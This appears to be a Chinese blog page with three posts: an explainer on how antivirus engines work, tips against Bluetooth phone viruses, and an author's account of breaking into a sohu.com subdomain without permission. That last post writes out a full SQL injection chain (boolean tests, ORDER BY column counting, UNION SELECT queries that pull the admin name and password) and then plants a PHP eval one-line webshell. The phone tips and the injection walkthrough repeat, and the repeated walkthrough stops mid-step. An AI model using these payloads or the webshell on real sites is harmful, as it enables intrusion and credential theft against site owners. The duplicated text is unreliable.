許多用戶都在挑選殺毒軟件時犯難,實際上,如果拋開許多表面上的東西,殺毒軟件的引擎實現技術也就那么幾個,關鍵在于殺毒廠商的研發能力和實際工作效率,也不能只憑殺毒軟件在對付某種病毒的差別上就斷定它們之間的地位差異。符合自己使用的,就是最好的。
學校機房新購入了一批電腦,負責安裝應用程序的李老師在殺毒軟件的選擇上犯了難,由于機房環境的復雜,如果不安裝殺毒軟件,勢必會因為使用者帶來運行的媒體介質感染了病毒而造成系統癱瘓或交叉感染,無論出現哪種情況都會影響上課進度和效率;但是,如果安裝的殺毒軟件功能不夠強大,無法及時更新數據,一樣不能防止病毒造成破壞。李老師考慮再三,還是決定來到電腦市場購買正版殺毒軟件,但是面對市場上眾多品牌的殺毒軟件,他又犯了難:瑞星、金山、江民、Norton、趨勢、熊貓、卡巴斯基、McAfee……每一款殺毒產品都具備它自己的優缺點和特色,我該選擇哪一種呢?
二. 從病毒原理說開去
病毒的定義和行為特征
在這個年代里,計算機病毒(Computer Virus)已經是家喻戶曉的名詞了,而其在業界里也早已有了定義:計算機病毒是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數據影響計算機使用,并能夠自我復制的一組計算機指令或者程序代碼,它可以是一個程序,一段執行代碼,像生物病毒一樣有獨特的復制能力,可以很快蔓延。他們能把自身附著在各種類型的文件上,隨文件的傳播而蔓延。現在隨著計算機網絡的發展,病毒和網絡技術結合,蔓延的速度更加迅速。計算機病毒具有可執行性、寄生性、傳染性、破壞性、欺騙性、隱蔽性、潛伏性、衍生性。
以上便是早期就已經定義好的計算機病毒概念,而如今可稱為病毒的,還有各種不會感染文件的特洛伊木馬程序(后門)等(Trojan、BackDoor),大部分特洛伊木馬除了不具備對文件的傳染性以外,其他特征均與病毒符合,而且一部分文件型特洛伊木馬還可感染文件。此外,還有一種通過系統漏洞進行傳播的惡意程序或“蠕蟲”(Worm),利用系統自帶的腳本語言功能實現破壞效果的宏病毒和惡意腳本(Macro Virus、Evil Script),因此,文中將把木馬后門、蠕蟲、宏病毒和傳統文件型病毒等統稱為“病毒”。
自我復制
病毒的基本動作是復制自身,文件型病毒會把自身插入正常程序文件內部以便程序每次執行時連病毒代碼也一并執行,惡意程序或木馬后門會將自身復制到系統目錄,然后通過多種途徑令系統在啟動時執行病毒體文件,但是無論是哪種病毒的復制行為,其最終目的都只有一個:潛伏到用戶計算機內,伺機執行各種危害操作。
病毒在執行復制行為時必須隱蔽,否則它會輕易被稍有經驗的用戶發現,因此不同的病毒都會采取各種手段來實現其隱蔽目的,但是無論它們的表現形式如何,最終都可歸納為兩種形式:寄生和欺騙。
寄生
這是文件型病毒的傳播方式,文件型病毒的成品一般沒有自己的獨立程序體,它們通過受感染的可執行文件進行傳播。當用戶執行一個感染了文件型病毒的程序時,由于原程序的執行入口已經被破壞,因此病毒代碼會首先得到執行,將自身載入內存中,成為一個“駐留程序”(TSR),根據病毒作者的破壞性差異,病毒可能僅僅停留在內存空間里等待用戶執行程序時進行感染操作,也可能會主動出擊,搜索用戶計算機上符合感染條件的可執行文件進行感染。
較普通的文件型病毒會將自身代碼放置到受感染文件的頭部或尾部,而后修改文件頭部的執行入口指向自身代碼起始段,以達到自身先于受感染程序執行的目的,當病毒在入內存后,才會去調用受感染文件的真正執行入口,讓受感染文件能夠運行,這樣用戶才不會起疑心。在早期的感染模式里,文件型病毒通常會主動搜索感染可執行文件,甚至因為感染失敗而導致文件損壞的事情也常有發生,而自從微軟在Windows 2000開始引入“系統文件校驗”技術后,主動搜索可執行文件進行感染的病毒寄生技術便因為導致系統不斷出現“系統文件遭遇替換”的警告而逐漸退出舞臺,繼而換成守株待兔類型的等待程序執行后進行感染的被動寄生方式。較新的文件型病毒還會采取不感染系統文件的政策,讓用戶無論如何都難以發現文件被感染的痕跡。
但是直接把自身簡單的插入文件首尾的寄生方式會導致文件體積和修改日期的變化,因此高級的病毒會自動根據目標文件內部的“無用”空間分配情況來將自身代碼分段插入文件體內,并修改文件日期為原始日期,如此一來便加大了檢測和查殺的難度。這一技術得以實現的原因是PE規范的特點:PE文件的每個節之間留有按簇大小對齊后的空洞,病毒體如果足夠小則可以將自身分成幾份并分別插入到每個節最后的空隙中,這樣就不必額外增加一個節,因而文件大小保持不變,能做到這種形式的病毒體積必須十分小巧,否則它會把文件破壞掉的。當文件被執行時,病毒通過初始化代碼的復雜計算將自身全部代碼恢復連貫載入內存,繼續完成下一次感染過程。
欺騙
并非所有病毒(注意此文的“病毒”所指范圍)都是文件型的,例如特洛伊木馬、蠕蟲和惡意程序等,那么它們如何將自身隱蔽呢?這就要用到欺騙了。所謂欺騙,就是利用各種手段將自身執行文件植入系統,而不被用戶輕易察覺,即使被發現,也難以判斷真偽或者無法徹底刪除,從最初的簡單設置文件屬性為隱藏,到現在的偽裝系統核心文件、DLL形式,甚至驅動程序類型的隱藏,病毒技術的不斷發展使得手工查殺增加了難度。
破壞
一個程序是否具備破壞性是衡量它是否屬于病毒的一個重要標準,病毒的破壞是多種多樣的,其實在它們進行寄生或欺騙操作時就已經對被感染的文件、以及受害計算機的環境完整性形成一定的破壞了,由于病毒需要駐留內存進行感染操作,直接導致的影響就是磁盤讀寫增加,計算機響應遲鈍,更有甚者為了取得最高的響應速度,而修改系統正常的優先級設置讓自己達到最高等級,從而導致系統效率嚴重下降。然而這還不是真正可怕的,當病毒發作時,可能會破壞你的文件檔案,或者敞開計算機大門讓入侵者隨意進出,甚至通過特殊的軟件讀寫達到破壞計算機硬件的目的。
三. 剖析殺毒軟件的心臟——引擎技術
病毒和反病毒產品是天生的冤家,由于病毒永無休止的存在,反病毒產品這片領域自然也會出現眾多廠商來分割的局面,因此也就銜生出了多種殺毒引擎技術。
殺毒引擎是決定一款殺毒軟件技術是否成熟可靠的關鍵,什么是殺毒引擎呢?簡言之,它就是一套判斷特定程序行為是否為病毒程序或可疑程序的技術機制,引擎不僅需要具備判斷病毒的能力,還必須擁有足夠的病毒清理技術和環境恢復技術,如果一款殺毒產品能查出病毒但是卻無法清除、或者無法將被病毒破壞的系統環境成功恢復,那它也只能是雞肋。為了達到查殺病毒的目的,殺毒引擎自身要實施的行為就要比病毒還病毒,例如,為了及時獲得環境變動的監控數據,一些殺毒引擎采用DLL的鉤子技術將自身注入系統進程中,這一行為和DLL木馬無異;而為了成功攔截查殺驅動級別木馬Rootkit,殺毒引擎更需要將自身的一部分作為驅動形式運行,以便進入系統內核領域……說到這里,一些計算機配置較低的用戶應該能明白,為什么自己安裝殺毒軟件后計算機速度明顯變慢了,這多半是因為殺毒軟件的“文件監控”等功能導致的,因為這一功能的實現原理就如文件型病毒的寄生過程一樣,只不過文件型病毒是守候在內存中伺機感染每一個打開的文件,而“文件監控”功能是時刻駐守在內存里檢查每一個打開的文件是否存在病毒,兩者導致的后果都是程序載入內存的時間增加,在低配置的計算機表現得比較明顯罷了。
由于以上提到的原因,殺毒軟件是會不可避免的對用戶計算機運行速度造成一定影響的,但是為了安全,大部分用戶只能犧牲一點工作效率來換取安全了,那么,殺毒引擎的具體實現過程又是如何呢?且讓我們來對其窺探一番。
1.守住每一個關卡——程序行為捕獲
每個程序運行時都需要進行各種交互動作,如收發網絡數據、響應某個觸發事件、文件讀寫操作等,這些交互都被稱為“行為”(Action),這個周期過程是可以被跟蹤記錄的,這就是殺毒引擎必須干涉的第一步,當殺毒軟件的環境監視模塊啟動后,它會嵌入系統的操作接口,使得任何非核心程序和除了殺毒軟件自身程序的運作過程都要被它實時監視,這一技術通常通過鉤子技術和驅動層掛載實現,每個殺毒軟件廠商都預先定義了一套病毒行為判斷規范,即在一個給定的范圍和置信度下,判斷相關操作是否為合法。例如一個代碼執行后被發現試圖將自己寫入用戶請求執行的程序文件體內、或進行特定的復制動作和添加注冊表操作,則可將其懷疑為病毒,移交給查毒過程的第二步進一步判斷處理。
為了實現行為捕獲操作,殺毒軟件引擎必須將自身模塊嵌入系統底層,在這個實現方法上,各大廠商都有自己的一套方案,一般廠商普遍采用的是中間件技術,即通過Hook掛鉤方式實現對每個進程的訪問,這種方案通過在系統底層與應用程序之間嵌入一個全局鉤子DLL模塊達到目的,從嚴格上來說,它的相對安全和穩定性較低,但是在源代碼不開放的操作系統層面上,這是最簡單的方法。
一部分廠商因為與操作系統廠商存在合作關系,因而獲得了較其他廠商殺毒產品要高的操作系統特權,所以他們采用的方案是基于系統最底層的系統核心驅動,這種實現方式是最安全的,或者說最高級的實現方式,至今只有Norton獲得了這個特權。隨著病毒技術逐漸滲透到Rootkit層次,過去的Hook技術逐漸有點力不從心,于是殺毒廠商開始轉入驅動方案,當然,由于沒有操作系統廠商的授權,他們并無法實現最底層的核心驅動解決方案,于是殺毒廠商編寫了一個稱為“軟件驅動”的中間件,用于在系統中產生一個虛擬硬件。眾所周知,在操作系統中,只有驅動模塊能通過一個“硬件抽象層(HAL)”的通訊接口而到達系統底層,如今流行的Rootkit木馬也是采用驅動形式進入系統核心的,因此殺毒廠商使用“軟件驅動”來實現底層監視的方案是要比一般的Hook技術效果顯著的,但是這也不可避免會出現一些問題,如果這個“軟件驅動”存在缺陷或者被某些程序異常終止(例如出現未預料的錯誤),在系統底層無任何保護措施的環境下,最直接的一個后果就是系統藍屏崩潰,造成可能的損失。
引用(小知識:系統的幾個“層”)
操作系統作為一個復雜的運作體系,其內部是必須實現一定的功能模塊來進行分工合作的,這些功能模塊像金字塔一樣層層堆積,形成了系統的幾個“層”,分別是系統核心層、硬件抽象層、用戶層。
系統核心層(Kernel Layer)位于整個操作系統的最底層,負責系統的基本運作,在這一層里的所有行為都由系統內置的指令來實現,所有外界因素都不會對這一處的行為造成影響。能直接進入這個層交互的程序不多,除了操作系統自身,第三方廠商若要能在此層直接工作,必須和系統廠商建立合作關系,使用系統廠商提供的接口函數才能進入。目前能在這個層面直接工作的殺毒軟件只有賽門鐵克的Norton AntiVirus。
硬件抽象層(Hardware Abstraction Layer)是美國微軟公司為了便于操作系統在不同硬件結構上進行移植而提出的將系統底層與硬件相關的部分獨立運作的思想,HAL為系統實現了“硬件無關性”,即在不同的硬件平臺上,硬件與操作系統的交互也不會有所差異,這樣一來,硬件廠商開發驅動的難度便能大大降低,HAL將硬件的接口細節隱藏起來,并為操作系統提供一個標準硬件交互接口,目前所有的硬件驅動都工作在這個層面上,當外界硬件存在指令請求時,驅動程序響應請求并將指令通過HAL轉換為系統核心層能理解的指令交給內核執行,如果未找到相應的驅動程序類型,則將其視為“默認硬件”(Default Hardware)處理,什么叫“默認硬件”呢?最簡單的例子就是進入安全模式,這時候大部分驅動程序不會被加載,此時的系統便是工作于“默認硬件”上。大部分使用“軟件驅動”解決方案的殺毒軟件就是在HAL層上虛擬了一個硬件來達到與核心層交互的效果,如McAfee、卡巴斯基等,瑞星2006也是通過這個方案實現了內核交互。
用戶層(User Layer)就是平時我們直接看到的部分,例如桌面,大部分殺毒軟件也是在這一層運行的,主要用于用戶接口交互和將指令傳遞到殺毒引擎。一般運行于Ring3的程序行為也產生于此,一個應用程序產生的指令要求首先被傳遞到HAL層,HAL層將其解釋處理為核心層可以識別的指令串,然后提交給核心層最后進入CPU的指令處理循環,CPU處理完畢后將結果反向送回到用戶層上的應用程序,最終得到運算結果。
2.檢測的核心——基于引擎機制的規則判斷
這一步環節可以稱之為病毒判斷的核心階段,一個好的殺毒引擎能在這個階段識別出相當規模的病毒,其原理是在引擎中內置一部分病毒的特征代碼,稱為“基于特征碼的靜態掃描技術”,即殺毒引擎直接在文件中查找自身攜帶的特征代碼,力求盡量在這一步發現病毒。早期的計算機用戶應該記得,當初的殺毒產品并沒有非常大的病毒特征數據庫,甚至KV300+的所謂病毒特征數據庫還是ASCII格式的,并由用戶自己手工加入,僅僅作為一種簡單的擴充手段來運作而已,這是因為KV300+的主程序內就已經包含了當時各種流行病毒的特征碼。
但是如今由于網絡普及和計算機技術發展,病毒攻勢鋪天蓋地而來,如果單純靠殺毒引擎自身攜帶病毒特征代碼,將會造成主程序體積過于龐大而無法高效率運行,且升級麻煩等難點,因而殺毒引擎不得不將病毒特征庫從自身脫離開來,形成獨立的病毒數據庫結構來與自身保持聯系,這就是“基于特征碼的靜態掃描技術”的擴展產物:病毒特征代碼數據庫。
3.在翰林辭典中穿梭——引擎與病毒特征庫的交互
由于上述原因,如今的殺毒軟件已經不得不采用外部數據庫連接的方法來達到識別病毒的效果,病毒特征代碼數據庫中以特定格式儲存了各種病毒的行為標識和靜態代碼,在工作時,殺毒引擎需要將捕獲到的程序行為轉換為它自身可以識別的行為標識和靜態代碼,然后進入病毒特征代碼數據庫中查詢并期待其返回查詢結果,因此這個步驟是整個殺毒過程中最慢的,但是不可否認,當前的殺毒軟件對大量病毒的識別都是在這個階段完成的。因此一個足夠龐大的病毒庫往往能夠彌補殺毒引擎的不足之處,但是當今病毒越發復雜和繁多,如此長期以往,病毒特征庫將會有一天過于臃腫而導致不良后果,要解決這個問題,只能在核心技術上盡量實現將病毒檢測工作在第二步完成,只可惜在當前我們仍然沒有能夠實現這個想法的殺毒引擎技術,因此如今的殺毒軟件或多或少都依賴著一個幾十MB的病毒特征庫來維持工作,殺毒廠商在殺毒引擎核心未進行關鍵修改時發布的病毒更新其實也就是為了往這個特征數據庫中添加最新發現的病毒數據,以達到查殺新病毒的作用。
“基于特征碼的靜態掃描技術”的最大弱點在于它無法發現和查殺“未公開”或“未收錄”的病毒,由于它的大部分判斷依據來自病毒特征代碼數據庫,一旦用戶被感染了病毒中的“0day”或“私人后門”,殺毒軟件就無能為力,甚至落得個被病毒終結運行的下場,當然,由于殺毒軟件自身的校驗機制,一般不會有病毒愚蠢到去感染殺毒軟件,但是如果一個殺毒軟件被病毒終止了,它就無法對用戶的計算機實施病毒防護了,但是如何判斷阻止由病毒發出的關閉指令,而不影響用戶正常點擊殺毒軟件自身提供的“退出”功能,這也是個難題。
一部分殺毒引擎會通過自身的病毒行為判斷規范來“懷疑”某些未收錄在數據庫中的程序為病毒,并詢問用戶需要什么解決方案,一般情況下,殺毒軟件最折衷的默認解決方案是將被懷疑動機不純的程序文件改名備份到一個被稱為“隔離區”的文件夾中,然后將該原始文件銷毀。這樣做或許能達到查殺未知病毒的目的,但是我們也不能忽視其可能帶來的嚴重后果,例如某個關鍵文件或重要文檔感染了病毒,如果殺毒軟件不由分說就將其消滅,那就很可能引發系統崩潰甚至經濟損失,因為一個健全穩妥的查殺過程和環境恢復是很重要的。
4.月光寶盒——病毒查殺和系統環境恢復
當殺毒引擎檢測到病毒時,需要分為兩種情況對待,首先是尚未來得及進行感染或破壞行為的病毒,在這種情況下殺毒引擎只需要簡單刪除文件就可以了,但是日常操作中用戶面臨最多的還是已經被病毒實施感染破壞行為后的系統環境,在這種情況下,殺毒引擎必須在使用適當的方式查殺病毒后,根據病毒特征庫中記錄的病毒行為來智能判斷當前系統環境遭受破壞的情況并進行恢復,例如對于受病毒感染的文件,殺毒引擎必須根據一定的算法在文件體內找出病毒代碼寄生的部分并給予清除,這個過程必須非常謹慎,否則直接的后果就是導致原文件被破壞,這樣的殺毒就毫無意義了。而對于非文件型的木馬和惡意程序,由于它們會通過各種方式篡改系統注冊表甚至系統文件來達到加載自身之目的,殺毒引擎在清除了這些病毒后能否準確有效的恢復受破壞的系統環境,就是對殺毒引擎的最大挑戰。病毒隱藏技術已經從最初的簡單加載單一啟動項,演化到今天的多重啟動項、進程互相保護、線程監視、遠程注射、可執行文件關聯、服務項目加載、驅動形式加載等方式,甚至采用多項結合的方法,使得查殺工作變得十分困難,甚至只要遺漏了一個文件未能清除,病毒便能卷土重來,因此,如何有效準確的判斷和修復受損環境,也是衡量殺毒引擎技術是否成熟的關鍵。
以上說的是殺毒引擎完整工作過程的原理,那么,它所采取的技術有哪些呢?目前,主流的技術有兩種:虛擬機技術、實時監控技術。除此之外,還有兩種最新的技術仍在試驗階段,分別是智能碼標識技術和行為攔截技術。
1.虛擬機技術
一提起虛擬機,部分讀者可能就會聯想到VMWare去了,然而這里提到的虛擬機并非如此。在反病毒界里,虛擬機也被稱為通用解密器,已經成為反病毒軟件中最重要的部分之一。殺毒引擎的虛擬機技術并非是為病毒提供一套計算機仿真系統,讓其在內部折騰直到暴露出病毒行為特征,在這里的虛擬機是指殺毒引擎模擬出一個仿真CPU,這個“CPU”具備和真正CPU等同的指令分析功能,殺毒引擎將待檢測的程序代碼讀入“CPU”中逐條指令循環執行,直到出現特定情況才結束工作,在這個過程中探知程序是否具備病毒行為特征或者暴露出病毒特征碼。這就是殺毒引擎的“虛擬機技術”,它的目的就是讓程序文件在沒有實際運行的情況下得到運行后的結果,最初虛擬機技術是為了對付變形病毒而產生的,因為變形病毒會將自身代碼以一定的方式進行多次變換,這樣傳統靜態特征碼掃描技術就對其無能為力,因為它根本無法確認特征碼,但是即使再強悍的變形病毒也不可避免在運行時出現一段相對固定的機器碼,否則它自身也無法正常運行完成變形過程,而由于這段機器碼只有在運行時才能被捕獲到,因此工程師開發了“虛擬機技術”誘使病毒在殺毒引擎產生的“CPU”里盡情運行,而后根據其固定機器碼匹配病毒特征數據庫中的靜態特征來判斷這個程序是否病毒。雖然這個技術可能會導致誤報,但是仍不能否認其是一種有效的方法。
2.實時監控技術
實時監控技術,說白了其實就是一個文件監視器,它會在文件打開、關閉、修改等操作時將其攔截并送入查毒模塊進行分析,而在如今的操作系統中要實現對所有文件操作的攔截并非易事,這需要涉及系統核心,因此,這里所采取的方案原型,就是“軟件驅動”。通過驅動進入核心,便能獲知每個文件的操作情況并做出反應了。這項技術的難度在于驅動代碼的編寫,由于內核沒有異常處理過程,在這里執行的代碼稍有一點錯漏都能直接導致系統崩潰,且驅動與用戶層的實時交互也需要一套復雜的實現方案,因此只有一定實力的廠家才實現這項技術,且實現了這項技術的廠家大部分都會連同虛擬機技術、靜態特征碼掃描技術一起結合起來,最終形成自己的產品。
四. 結語
許多用戶都在挑選殺毒軟件時犯難,實際上,如果拋開許多表面上的東西,殺毒軟件的引擎實現技術也就那么幾個,關鍵在于殺毒廠商的研發能力和實際工作效率,也不能只憑殺毒軟件在對付某種病毒的差別上就斷定它們之間的地位差異。符合自己使用的,就是最好的。
防范技巧:七招預防藍牙手機中的病毒
[ 2007-03-25 02:37:13 | 作者: sun ]
電腦很容易感染病毒,手機也一樣,隨著支持藍牙的手機越來越多,有必要提醒廣大藍牙手機用戶注意預防手機中毒。
“當機”、“終止應用程序”、“衍生變種家族”、“無線入侵”、“偽裝免費軟件”甚至“竊取資訊”,這些電腦病毒常見的破壞手法,現在手機病毒也跟著模仿,入侵手機用戶。最近的一份報告指出,手機病毒可能造成文件、電話簿、信息、相片以及電話本身的操作功能喪失。
但總體看來,手機病毒雖然開始模仿電腦病毒,但是主動散播力較弱。不隨便使用藍牙接收來路不明的短信,一般來說,不容易感染。這里就給大家提七個建議,預防手機病毒跟著走:
●接收藍牙傳送文件要特別謹慎,以免收到病毒文件。
●不慎中毒暫時關閉手機上的藍牙接收功能,以免繼續搜尋感染目標。
●收到來路不明的短信,不要打開直接刪除。
●對于來路不明的手機程序不要任意安裝。
●下載手機鈴聲、手機游戲,請至合法官方網站。
●若不慎中毒請立即刪除病毒應用程序,并重新安裝受感染的應用程序。
●安裝專門的手機防毒軟件。
“當機”、“終止應用程序”、“衍生變種家族”、“無線入侵”、“偽裝免費軟件”甚至“竊取資訊”,這些電腦病毒常見的破壞手法,現在手機病毒也跟著模仿,入侵手機用戶。最近的一份報告指出,手機病毒可能造成文件、電話簿、信息、相片以及電話本身的操作功能喪失。
但總體看來,手機病毒雖然開始模仿電腦病毒,但是主動散播力較弱。不隨便使用藍牙接收來路不明的短信,一般來說,不容易感染。這里就給大家提七個建議,預防手機病毒跟著走:
●接收藍牙傳送文件要特別謹慎,以免收到病毒文件。
●不慎中毒暫時關閉手機上的藍牙接收功能,以免繼續搜尋感染目標。
●收到來路不明的短信,不要打開直接刪除。
●對于來路不明的手機程序不要任意安裝。
●下載手機鈴聲、手機游戲,請至合法官方網站。
●若不慎中毒請立即刪除病毒應用程序,并重新安裝受感染的應用程序。
●安裝專門的手機防毒軟件。
對sohu.com的一次安全檢測
[ 2007-03-25 02:36:07 | 作者: sun ]
sohu.com是國內一家比較大的門戶網站,提供了包括郵箱在內的很多服務。這么大的一個網站,不出問題是很難的,俗話說服務越多越不安全嘛!無論是對于服務器還是網站都是這個道理,最近學習Mysql注入,于是順便就對sohu.com做了一次小小的安全檢測,看看它存不存在SQL注入漏洞。
看看sohu.com的主站發現差不多都是靜態的,于是放棄了在主站上找問題的想法。直接在sohu.com的各個分站上瀏覽了一圈后發現,大部分網站采用的都是Php腳本,也有少數用的是jsp腳本,根據經驗我們知道,對于Php構建的系統,一般后臺數據庫都是Mysql,就好象asp對應著Mssql一樣,看來可能存在問題的地方還是很多的。由于Php的特性(Php默認將傳遞的參數中的'等字符做了轉換,所以對于字符類型的變量默認情況下很難注入),一般情況下我們注入的只能是數字類型的變量了。根據平時注入的知識,我們知道id=XXX這樣的形式傳遞的參數一般都是數字類型的變量,所以我們只要去測試那些php?id=XXX的連接就可能找到漏洞了!通過一番仔細的搜索,還真讓我在XXX.it.sohu.com上找到了一個存在問題的連接http://XXX.it.sohu.com/book/serialize.php?id=86
提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
返回正常如圖1。
然后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
返回沒有信息如圖2,空空的吧,應該是SQL語句結果為空了。
通過這兩個Url我們可以猜測漏洞是存在的,因為我們提交的and 1=1和and 1=2都被當作Sql語句執行啦!那么我們提交的其他語句也是可以執行的,這就是Sql注入了!我們還可以知道id這個變量是被當作數字處理的,沒有放到''之間,否則我們是成功不了的哦!如果變量沒有過濾Sql其他關鍵字的話,我們就很有可能成功啦!我遇到很多的情況都是變量過濾了select,在mysql里就是死路了,好郁悶!
既然漏洞是存在的,讓我們繼續吧!首先當然是探測數據庫的類型和連接數據庫的帳戶啦!權限高并且數據庫和web同機器的話可以免除猜測字段的痛苦啦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51/*
返回正常如圖3,這個語句是看數據庫的版本是不是高于3的,因為3的ASCII是51嘛!版本的第一個字符是大于51的話當然就是4.0以上啦!4.0以上是支持union查詢的,這樣就可以免除一位一位猜測的痛苦哦!這里結果為真,所以數據庫是4.0以上的哦,可以支持union了。
既然支持union查詢就先把這個語句的字段給暴出來吧!以后再用union查詢什么都是很快的哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10/*
返回結果正常如圖4,看來字段是大于10個的,繼續提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20/*
正常返回,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*
......
到order by 50的時候返回沒有信息了!看來是大于40的小于50的,于是提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*
......
終于猜測到字段是41左右啦!這里說是左右是因為有些字段是不能排序的,所以還需要我們用union精確定位字段數字是41,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結果如圖5,哈哈,成功了哦!哪些字段會在頁面顯示也是一目了然了!現在讓我們繼續吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結果如圖6,完成了數據庫系統的探測哦!我們很有可能不是root,并且數據庫服務器和web也很有可能不是在一臺服務器,這樣的話我們就沒有file權限了!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*
返回結果如圖7,沒有對mysql的讀取權限,更加確定權限不是root了!呵呵!
既然不是root,也不要氣餒,讓我們繼續吧!在進一步猜測數據之前我們最好找下后臺先,很多時候找到了管理員密碼卻找不到地方登陸,很郁悶的說!在根目錄下加/admin和/manage/等等后臺常用的地址都是返回404錯誤,猜測了幾次終于在/book/目錄下admin的時候出現了403 Forbiden錯誤,哈哈,是存在這個目錄的!但是登陸頁面死活也猜不出來,郁悶中!不過既然知道有個admin也好說,去Google里搜索:
admin site:sohu.com
如圖8,得到了另外一個分站的論壇,我們知道人是很懶惰的,通常一個地方的后臺的特征就很可能是整個網站的特征,所以當我嘗試訪問/book/admin/admuser.php的時候奇跡出現了,如圖9,哈哈,離成功更近了哦!到這里我們知道了網站的后臺,其實我們還可以得到很重要的信息,查看原文件發現登陸表單的名字是name和password,很容易推測出對方管理員表中的結構,即使不符合估計也差不多,呵呵!所以知道為什么我們要先猜測后臺了吧!繼續注入吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
返回錯誤,說明不存在admin這個表,嘗試admins以及admin_user等等,最后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
的時候返回成功,哈哈!有User這個表!那么是不是管理員表呢?字段又是什么呢?繼續提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回空信息的錯誤,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結果如圖10,哈哈正常返回并且出來了一個密碼,應該是管理員表里第一個用戶的密碼!那么他的用戶名字是什么呢?猜測很多字段都是返回錯誤,實在沒有辦法的時候輸入一個ID,居然返回成功了!ID就是管理員的名字哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結果如圖11,哈哈,得到管理員的名字了哦!激動地拿著管理員名字和密碼去后臺登陸成功了哦!如圖12。現在是想想怎么拿webshell的時候了,在后臺發現有上傳圖片的地方,但是當上傳php文件的時候提示說不是圖片文件,郁悶了!在后臺仔細的亂七八糟的亂翻了會,發現有個生成php文件的功能,于是在里面插入了一句話的php后門<? eval($_POST[a])?>,如圖13,點生成之后提示成功了,看來如果沒有過濾的話我們應該是得到webshell了,密碼是a,用一句話后門連上去如圖14,哈哈,成功了!腳本檢測到此圓滿完成!
在得到webshell之后我上服務器上看了看,發現服務器的安全是做得不錯,執行不了命令,并且基本上所有的目錄除了我們剛才上傳的目錄之外都是不可寫的,不過作為腳本測試,得到了webshell也就算成功了吧!也可以看出,小小的一個參數沒有過濾就可以導致網站的淪陷,特別是像sohu.com這樣的大站,參數更多,更加要注意過濾方面的問題哦!歡迎大家到論壇討論,我的ID是劍心
看看sohu.com的主站發現差不多都是靜態的,于是放棄了在主站上找問題的想法。直接在sohu.com的各個分站上瀏覽了一圈后發現,大部分網站采用的都是Php腳本,也有少數用的是jsp腳本,根據經驗我們知道,對于Php構建的系統,一般后臺數據庫都是Mysql,就好象asp對應著Mssql一樣,看來可能存在問題的地方還是很多的。由于Php的特性(Php默認將傳遞的參數中的'等字符做了轉換,所以對于字符類型的變量默認情況下很難注入),一般情況下我們注入的只能是數字類型的變量了。根據平時注入的知識,我們知道id=XXX這樣的形式傳遞的參數一般都是數字類型的變量,所以我們只要去測試那些php?id=XXX的連接就可能找到漏洞了!通過一番仔細的搜索,還真讓我在XXX.it.sohu.com上找到了一個存在問題的連接http://XXX.it.sohu.com/book/serialize.php?id=86
提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
返回正常如圖1。
然后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
返回沒有信息如圖2,空空的吧,應該是SQL語句結果為空了。
通過這兩個Url我們可以猜測漏洞是存在的,因為我們提交的and 1=1和and 1=2都被當作Sql語句執行啦!那么我們提交的其他語句也是可以執行的,這就是Sql注入了!我們還可以知道id這個變量是被當作數字處理的,沒有放到''之間,否則我們是成功不了的哦!如果變量沒有過濾Sql其他關鍵字的話,我們就很有可能成功啦!我遇到很多的情況都是變量過濾了select,在mysql里就是死路了,好郁悶!
既然漏洞是存在的,讓我們繼續吧!首先當然是探測數據庫的類型和連接數據庫的帳戶啦!權限高并且數據庫和web同機器的話可以免除猜測字段的痛苦啦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51/*
返回正常如圖3,這個語句是看數據庫的版本是不是高于3的,因為3的ASCII是51嘛!版本的第一個字符是大于51的話當然就是4.0以上啦!4.0以上是支持union查詢的,這樣就可以免除一位一位猜測的痛苦哦!這里結果為真,所以數據庫是4.0以上的哦,可以支持union了。
既然支持union查詢就先把這個語句的字段給暴出來吧!以后再用union查詢什么都是很快的哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10/*
返回結果正常如圖4,看來字段是大于10個的,繼續提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20/*
正常返回,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*
......
到order by 50的時候返回沒有信息了!看來是大于40的小于50的,于是提交:
